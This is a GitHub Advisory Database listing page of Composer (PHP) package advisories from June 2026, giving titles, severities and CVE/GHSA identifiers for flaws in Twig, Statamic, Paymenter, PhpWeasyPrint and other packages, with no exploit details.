GitHub Advisory Database
Security vulnerability database inclusive of CVEs and GitHub originated security advisories from the world of open source software.
Filter advisories
GitHub reviewed advisories
Unreviewed advisories
Filter advisories
Filter advisories
GitHub reviewed advisories
All reviewed
5,000+
Composer
5,000+
Erlang
91
GitHub Actions
54
Go
4,194
Maven
5,000+
npm
5,000+
NuGet
1,021
pip
5,000+
Pub
13
RubyGems
1,102
Rust
1,422
Swift
61
Unreviewed advisories
All unreviewed
5,000+
6,129 advisories
Filter by severity
Paymenter has race condition in payWithCredit() that enables credit double-spend
Moderate
CVE-2026-55219
was published
for
paymenter/paymenter
(Composer)
Jun 30, 2026
Twig: Sandbox property allowlist bypass via the `column` filter under `SourcePolicyInterface`
Moderate
CVE-2026-48808
was published
for
twig/twig
(Composer)
Jun 30, 2026
Twig: Sandbox `__toString()` policy bypass via `Traversable` in `join` and `replace` filters
Moderate
CVE-2026-48807
was published
for
twig/twig
(Composer)
Jun 30, 2026
Twig: Sandbox `__toString()` policy bypass via dynamic mapping keys
Moderate
CVE-2026-48806
was published
for
twig/twig
(Composer)
Jun 30, 2026
Twig: Sandbox state regression in deprecated internal wrappers in `src/Resources/core.php`
Low
CVE-2026-48805
was published
for
twig/twig
(Composer)
Jun 30, 2026
Paymenter has URL parameter injection that bypasses paid plan limits at checkout
High
CVE-2026-47198
was published
for
paymenter/paymenter
(Composer)
Jun 30, 2026
Statamic CMS's incorrect authorization lets view-only users submit Live Preview content reserved for editors
Low
CVE-2026-54244
was published
for
statamic/cms
(Composer)
Jun 26, 2026
Statamic Vulnerable to CSV formula injection in form submission exports
Moderate
CVE-2026-54243
was published
for
statamic/cms
(Composer)
Jun 26, 2026
Statamic Vulnerable to Server-Side Request Forgery via Glide (DNS rebinding)
Moderate
CVE-2026-54242
was published
for
statamic/cms
(Composer)
Jun 26, 2026
SolidInvoice: IDOR in LiveComponent allows same-company cross-user access to API tokens and notification transport settings
High
GHSA-7vfx-4246-jcfh
was published
for
solidinvoice/solidinvoice
(Composer)
Jun 26, 2026
Statamic CMS's unsafe method invocation via collection sorting allows data destruction
High
CVE-2026-49287
was published
for
statamic/cms
(Composer)
Jun 26, 2026
Statamic CMS: Missing authorization on Control Panel fieldtype endpoints allows disclosure of restricted resources
Moderate
CVE-2026-49288
was published
for
statamic/cms
(Composer)
Jun 26, 2026
PhpWeasyPrint vulnerable to SSRF and local file disclosure via the attachment option
Moderate
CVE-2026-49359
was published
for
pontedilana/php-weasyprint
(Composer)
Jun 26, 2026
PhpWeasyPrint vulnerable to arbitrary file deletion at shutdown via public $temporaryFiles
Low
CVE-2026-49358
was published
for
pontedilana/php-weasyprint
(Composer)
Jun 26, 2026
PhpWeasyPrint vulnerable to PHAR deserialization via output filename (CVE-2023-28115 case-insensitive bypass)
High
CVE-2026-49286
was published
for
pontedilana/php-weasyprint
(Composer)
Jun 26, 2026
Aimeos Pagible CMS vulnerable to Server Side Request Forgery (SSRF) via DNS rebinding in admin proxy
Low
CVE-2026-49262
was published
for
aimeos/pagible
(Composer)
Jun 26, 2026
php-weasyprint: shell command injection via configurable WeasyPrint binary path due to inverted is_executable() guard (mirror of KnpLabs/snappy GHSA-vpr4-p6fq-85jc)
High
CVE-2026-49260
was published
for
pontedilana/php-weasyprint
(Composer)
Jun 26, 2026
phpMyFAQ has an incomplete fix for GHSA-xvp4-phqj-cjr3 — editUser() and updateUserRights() lack authorization guards
High
GHSA-985r-q3qp-299h
was published
for
phpmyfaq/phpmyfaq
(Composer)
Jun 26, 2026
WebauthnAuthenticator leaks sensitive HTTP headers through INFO-level logs
Moderate
GHSA-q683-8468-r6h6
was published
for
web-auth/webauthn-symfony-bundle
(Composer)
Jun 26, 2026
CakePHP: View::element() is missing a path containment check
Moderate
CVE-2026-48820
was published
for
cakephp/cakephp
(Composer)
Jun 26, 2026
PHP Standard Library: HTTP/2 server-side missing content-length validation enables request smuggling
High
CVE-2026-48979
was published
for
php-standard-library/h2
(Composer)
Jun 26, 2026
Pterodactyl Panel: Client email change endpoint allows enumeration of accounts in system
Moderate
GHSA-j7f5-gfqm-pcx3
was published
for
pterodactyl/panel
(Composer)
Jun 26, 2026
Filament: Multi-factor authentication (app) recovery codes can still be used multiple times via concurrent submission
High
CVE-2026-48505
was published
for
filament/filament
(Composer)
Jun 25, 2026
Snipe-IT API Vulnerable to Cross-Tenant Accessory Injection
High
CVE-2026-54329
was published
for
snipe/snipe-it
(Composer)
Jun 23, 2026
Snipe-IT's S3 signature image retrieval lacks authorization before temporary URL
Low
CVE-2026-55542
was published
for
snipe/snipe-it
(Composer)
Jun 23, 2026
ProTip!
Advisories are also available from the
GraphQL API